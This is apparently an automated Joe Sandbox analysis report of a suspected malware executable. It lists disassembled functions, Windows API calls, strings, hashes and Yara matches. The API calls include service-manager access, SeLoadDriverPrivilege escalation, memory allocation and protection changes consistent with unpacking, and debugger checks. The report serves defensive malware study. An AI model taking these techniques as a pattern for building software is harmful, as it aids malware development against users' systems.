                                    • Instruction Fuzzy Hash: 7401B535244301AAE22177B6BC56BEB3748AF81378F20007BF505962E1DAFC8CD5826D
                                    Function 00609530 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 521 609530-609548 522 609550-609555 521->522 523 6096f4-6096f9 522->523 524 60955b 522->524 525 6097c7-6097cc 523->525 526 6096ff 523->526 527 609561-609566 524->527 528 60967d-609684 524->528 535 609580-609585 525->535 536 6097d2-6097f7 525->536 531 609701-609706 526->531 532 609773-60977a 526->532 533 609614-609619 527->533 534 60956c 527->534 529 6096a1-6096ac 528->529 530 609686-60969c call 603e40 call 603da0 528->530 562 6096c9-6096da 529->562 563 6096ae-6096c4 call 603e40 call 603da0 529->563 530->529 538 609722-609729 531->538 539 609708-60970d 531->539 540 609797-6097a6 OpenSCManagerW 532->540 541 60977c-609792 call 603e40 call 603da0 532->541 533->535 545 60961f-609678 533->545 542 6095e3-6095ea 534->542 543 60956e-609573 534->543 535->522 544 609587-609593 535->544 536->522 554 609746-60976e call 603c80 538->554 555 60972b-609741 call 603e40 call 603da0 538->555 539->535 547 609713-60971d call 607950 539->547 556 6097a8-6097b8 540->556 557 6097bd-6097c2 540->557 541->540 549 609607-60960f 542->549 550 6095ec-609602 call 603e40 call 603da0 542->550 552 609594-60959c 543->552 553 609575-60957a 543->553 545->522 547->522 549->522 550->549 566 6095bc-6095d0 552->566 567 60959e-6095b6 call 603e40 call 603da0 552->567 553->535 564 6097fc-609803 553->564 554->522 555->554 556->522 557->522 588 6096e0-6096ef 562->588 589 609848-609854 562->589 563->562 577 609820-60982b 564->577 578 609805-60981b call 603e40 call 603da0 564->578 585 6095d4-6095de 566->585 567->566 592 60982f-609845 call 603000 577->592 578->577 585->522 588->522 592->589
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006097A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID: y7@+
                                    • API String ID: 1889721586-1251112282
                                    • Opcode ID: da5ded9e30d80f916b77516d6b3697f9206bb9c5af19efb48474a8dc3e2f3bb4
                                    • Instruction ID: 2fde52583634a6b31a4d7a3068689a3c764712dcc1f90d7045bdc76ed7f2dbc9
                                    • Opcode Fuzzy Hash: da5ded9e30d80f916b77516d6b3697f9206bb9c5af19efb48474a8dc3e2f3bb4
                                    • Instruction Fuzzy Hash: EF71AD707D43018BD75D9F68AC9576B72A7AB84B00F10082EF145DB3D2EA70DD09CBA6
                                    Function 00604A80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 603 604a80-604a90 604 604a92-604aa8 call 603e40 call 603da0 603->604 605 604aad-604aca 603->605 604->605 610 604ae7-604b05 CreateProcessW 605->610 611 604acc-604ae2 call 603e40 call 603da0 605->611 612 604b83-604b8a 610->612 613 604b07-604b0d 610->613 611->610 616 604b24-604b2b 613->616 617 604b0f-604b23 613->617 619 604b48-604b55 616->619 620 604b2d-604b43 call 603e40 call 603da0 616->620 627 604b72-604b82 619->627 628 604b57-604b6d call 603e40 call 603da0 619->628 620->619 628->627
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00604B01
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: D
                                    • API String ID: 963392458-2746444292
                                    • Opcode ID: 5126ed7d76014ce7b1d8cf51a1c447f4a24b0b93feced25e50ebdec9480f8278
                                    • Instruction ID: 466a66d7c949186711452db90c214ed688910a46fb9693bd5b42324434b3aae5
                                    • Opcode Fuzzy Hash: 5126ed7d76014ce7b1d8cf51a1c447f4a24b0b93feced25e50ebdec9480f8278
                                    • Instruction Fuzzy Hash: B921AB70B903015BE768AB68CC01BAB739BAFC4B00F04492DB655CB3D0EEB5CD058395
                                    Function 0040EC40 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 635 40ec40-40ec6f call 40ebe0 639 40ec71-40ec88 VirtualAlloc 635->639 640 40eca3-40ecb2 635->640 639->640 641 40ec8a-40eca0 639->641 641->640
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E
                                    Strings
                                    • tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F, xrefs: 0040EC93
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F
                                    • API String ID: 4275171209-1198268820
                                    • Opcode ID: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction ID: 01d0f4e730c09718d0011088008fc3b8b73f4a900f8981e618274441f709c89d
                                    • Opcode Fuzzy Hash: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction Fuzzy Hash: 9EF046B5A846203BF22157258C0AFAF7E68CB84B50F544528FE046A2C0D7B89A0182DE
                                    Function 020E1D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 810 20e1d10-20e1d1d 811 20e1d1f-20e1d24 810->811 812 20e1d29-20e1d35 810->812 813 20e1e71-20e1e74 811->813 814 20e1d9d-20e1da9 812->814 815 20e1d37-20e1d42 812->815 816 20e1dab-20e1db2 814->816 817 20e1db4 814->817 818 20e1d44-20e1d4b 815->818 819 20e1d93-20e1d98 815->819 820 20e1dbb-20e1dcd 816->820 817->820 821 20e1d6f-20e1d8e call 20e1820 818->821 822 20e1d4d-20e1d5b 818->822 819->813 823 20e1dcf-20e1dd6 820->823 824 20e1dd8 820->824 827 20e1d90 821->827 822->821 825 20e1d5d-20e1d6d 822->825 826 20e1ddf-20e1df1 823->826 824->826 825->819 825->821 828 20e1dfc 826->828 829 20e1df3-20e1dfa 826->829 827->819 830 20e1e03-20e1e2e 828->830 829->830 831 20e1e3c-20e1e59 VirtualProtect 830->831 832 20e1e30-20e1e39 830->832 833 20e1e6c 831->833 834 20e1e5b-20e1e6a call 20e1b20 831->834 832->831 833->813 834->813
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e68c1af996a341e62c7dc9fad1afa9741ab55899a349054725438aa47170f758
                                    • Instruction ID: 2e6fd301ebf17f7534a09d365defff99b1cf71b230e4b9bad105493300293e71
                                    • Opcode Fuzzy Hash: e68c1af996a341e62c7dc9fad1afa9741ab55899a349054725438aa47170f758
                                    • Instruction Fuzzy Hash: 7B41C574A04209AFDB45DF44C494BAEB7B2FB88314F24C199E81A5F355C775EE82DB80
                                    Function 00603670 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: af312b1ec1dae1fe8ffa610f702541a8a10efe778052e2765cedc299e6073d92
                                    • Instruction ID: 24e887ca475f3adf23278b0115b53cf71ed78e04cb25c141ed464b0cf058d41c
                                    • Opcode Fuzzy Hash: af312b1ec1dae1fe8ffa610f702541a8a10efe778052e2765cedc299e6073d92
                                    • Instruction Fuzzy Hash: E3119170B902205BD7ACABB49D11A6B36EF9FC8701B40492EF615CB3C1EE75DE018795
                                    Function 00606CD0 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00606F05,?,33A6B453,006068AC), ref: 00606D00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 6897006f12fd4eccd63b986342aa29c356f4b010db34f9a2ea8196e787eea503
                                    • Instruction ID: 8316a1caecb3a3332ecbfcf7cbee43f1fc0342861388325ed1bcf33923d03931
                                    • Opcode Fuzzy Hash: 6897006f12fd4eccd63b986342aa29c356f4b010db34f9a2ea8196e787eea503
                                    • Instruction Fuzzy Hash: F5016D307802604BD79CBBB99850A2B36EBAFC8600700992EF509CB3D1EE34DD028B94
                                    Function 020E27B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 50e2670c90142c94f8c7e7d673f8e184b482f4407b322eada844b233527f0048
                                    • Instruction ID: 8a5c0b6d5746d6e29bfe7f02e1a8e7b0312f5926780e58f598e1e2b4d1fd5307
                                    • Opcode Fuzzy Hash: 50e2670c90142c94f8c7e7d673f8e184b482f4407b322eada844b233527f0048
                                    • Instruction Fuzzy Hash: EFD05EB4D40308FFEB00EFA4D90AB9DBBB4EB04701F108165E9056B240E6B02B44DF52
                                    Function 020E1820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 020E182F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 6a883493564ada025baec0f8d3f97c669d9f11cd6d74832e186b9eca16b2912a
                                    • Instruction ID: 3e850c5857471cf67c5a8cfcc649f087763ed4edebc4c8d558f62fc0a5046611
                                    • Opcode Fuzzy Hash: 6a883493564ada025baec0f8d3f97c669d9f11cd6d74832e186b9eca16b2912a
                                    • Instruction Fuzzy Hash: C5C04C7A55430CEB8B04DF98E894DAB3BADBB8CA10B048948BA1D87200C634F9508BA4

                                    Non-executed Functions

                                    Function 0040F510 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 155processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 0040F53E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F58B
                                    • CloseHandle.KERNEL32(00000000), ref: 0040F5A2
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFirstFormatHandleLastMessageNameProcess32SnapshotToolhelp32User
                                    • String ID: $%d K$CreateToolhelp32Snapshot (of processes)$Process32First
                                    • API String ID: 3266005361-2221559773
                                    • Opcode ID: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction ID: 63f366d3fdf1a23c1a20b758398628cdb4654b08413e4f9ed28baa702ff12125
                                    • Opcode Fuzzy Hash: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction Fuzzy Hash: 6251B671504300ABD324AB64DC52FEB73E8EF84758F44493EF589922C1EB7C9948879B
                                    Function 0040E220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0040E22E
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D
                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040E28B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeLoadDriverPrivilege
                                    • API String ID: 2349140579-497486668
                                    • Opcode ID: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction ID: 6ea790c7a31b1ba1ad77907437152988263291b3601ce40a83fb03ebe5ecb5a6
                                    • Opcode Fuzzy Hash: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction Fuzzy Hash: D301DAB4548301AFD704DF50C999F9BBBE4AB8CB08F40891DF58A862A0E774E948CB56
                                    Function 004100FB Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041212A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041213F
                                    • UnhandledExceptionFilter.KERNEL32(0041989C), ref: 0041214A
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00412166
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction ID: b5dc470c48336d2cad9fc5f7ad5caf64c585ac90b15cfe1187e4ee1c5b5d9eed
                                    • Opcode Fuzzy Hash: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction Fuzzy Hash: 8C21DBB4911204EFD700DF69EC896C63BB4BB6C315F50803AE90A87372E7B4598A8F1D
                                    Function 0040E170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32 ref: 0040E18D
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    • WARNING: %s failed with error %d (%s), xrefs: 0040E1F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID: WARNING: %s failed with error %d (%s)
                                    • API String ID: 3479602957-1953342023
                                    • Opcode ID: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction ID: 71bfe3ff1a5da696a3addf6ac62f14f1fc4c04e671a446e7e169288bb51f98c2
                                    • Opcode Fuzzy Hash: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction Fuzzy Hash: 1201267160430066E7249B12DC86BFB3BA9EF8A710F504C3AF555CA1D0E6749890C29E
                                    Function 006063F0 Relevance: 4.3, Strings: 3, Instructions: 560COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *'$lmu/$lmu/
                                    • API String ID: 0-636906075
                                    • Opcode ID: 9225c70673361e4e4156f0746dad4bc534e091efd2a74c1fef8709565fb512f5
                                    • Instruction ID: 736527d0488f6f1c7e8dcc17fe454a9d0596978e8c93251d9c5221ff88c726d9
                                    • Opcode Fuzzy Hash: 9225c70673361e4e4156f0746dad4bc534e091efd2a74c1fef8709565fb512f5
                                    • Instruction Fuzzy Hash: 8C022270AC43018BC66CEA78D88956F76D39BC4748F64882EF582C73D1EE24CD668797
                                    Function 005F7F8E Relevance: 4.3, Strings: 3, Instructions: 560COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *'$lmu/$lmu/
                                    • API String ID: 0-636906075
                                    • Opcode ID: b7524a3de83cd4a76f4d447deb268b03eed86ef20e49021a3d0791e93a30b770
                                    • Instruction ID: bfc592a59e1dac49656133326e38a73f7955ef2d5ca8e75a8a8e25ffb51373d0
                                    • Opcode Fuzzy Hash: b7524a3de83cd4a76f4d447deb268b03eed86ef20e49021a3d0791e93a30b770
                                    • Instruction Fuzzy Hash: 2502F635A0830E87DA24AA68888913E7ED17BD4750F744D2AF796CB351EE3CCD4587A3
                                    Function 005F98FE Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DR$Ou$fX
                                    • API String ID: 0-261343277
                                    • Opcode ID: 9a4cfae2509eada84d4514ed3e752f1f713b4941d1beb8100a69beae9a0044a5
                                    • Instruction ID: 540b9bb482925fb2ddd9e8f9f14f804f07e76b9febed83197d8c3a6d9f544a46
                                    • Opcode Fuzzy Hash: 9a4cfae2509eada84d4514ed3e752f1f713b4941d1beb8100a69beae9a0044a5
                                    • Instruction Fuzzy Hash: AC81A0716087058FD728DF68998563ABAE4BBC4714F00092EF285D7394E7B8D909CB56
                                    Function 005F9C6E Relevance: 3.9, Strings: 3, Instructions: 169COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DR$Ou$m
                                    • API String ID: 0-902897619
                                    • Opcode ID: b62bf488743f1a2059ce3998f655a55e53d780affa885b97e3efcba5522db659
                                    • Instruction ID: a52b96af204781e47819a47b9c72ca1cd059e3f14f13794958ca04305cdfbe69
                                    • Opcode Fuzzy Hash: b62bf488743f1a2059ce3998f655a55e53d780affa885b97e3efcba5522db659
                                    • Instruction Fuzzy Hash: 0861AF71A087068BD718EF68C849A3EBBE5BBD0714F04491DF6D5D7294D7B8C909CB82
                                    Function 00608660 Relevance: 3.9, Strings: 3, Instructions: 160COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #CH.$#CH.$\au
                                    • API String ID: 0-122621526
                                    • Opcode ID: 82e2cfa5556967d161bd3d2bcdb052a574f9c125b0815518756db8578ac95d5e
                                    • Instruction ID: 6eac3d1373298bed3042ed380473540bf717abe695c5f5eba4b693c7a7d5a2c0
                                    • Opcode Fuzzy Hash: 82e2cfa5556967d161bd3d2bcdb052a574f9c125b0815518756db8578ac95d5e
                                    • Instruction Fuzzy Hash: C241E270B802009FDB6CDBA89C81B7F729BAB94710F54492EB585DB3C5DEA5DD018352
                                    Function 0040E930 Relevance: 3.1, APIs: 2, Instructions: 54libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00410250: __wcstoi64.LIBCMT ref: 00410246
                                    • LdrFindResource_U.NTDLL(00400000,?,00000000), ref: 0040E988
                                    • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 0040E9A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: AccessFindResourceResource___wcstoi64
                                    • String ID:
                                    • API String ID: 2704380589-0
                                    • Opcode ID: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
                                    • Instruction ID: 9141d4ce81294af721937c9894f8c7d92bdb9d8b2fa3c749db9c995ded6ab3af
                                    • Opcode Fuzzy Hash: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
                                    • Instruction Fuzzy Hash: E511F8B5618301AFC304DF15D851BABBBE4BBC8744F408D2EF48997251D778E9488B96
                                    Function 00607530 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j>$_I
                                    • API String ID: 0-1249037685
                                    • Opcode ID: 984e086376af8a6a208711bc64dd2d58036b1380d25653babe967f55a3ac1166
                                    • Instruction ID: ae283642ad28cf50a73b261e51888c240b41a4820707e652249cb0ae396d4041
                                    • Opcode Fuzzy Hash: 984e086376af8a6a208711bc64dd2d58036b1380d25653babe967f55a3ac1166
                                    • Instruction Fuzzy Hash: 79A19C71A483028BD75CDF68D94552BB6E6BBC4744F004A2DF5869B390E770EE09CB92
                                    Function 005F90CE Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j>$_I
                                    • API String ID: 0-1249037685
                                    • Opcode ID: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
                                    • Instruction ID: 853e7df9c4b0a6f7bfa213099c5972a9325ea15a5a17aeb8fc519338bb15832a
                                    • Opcode Fuzzy Hash: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
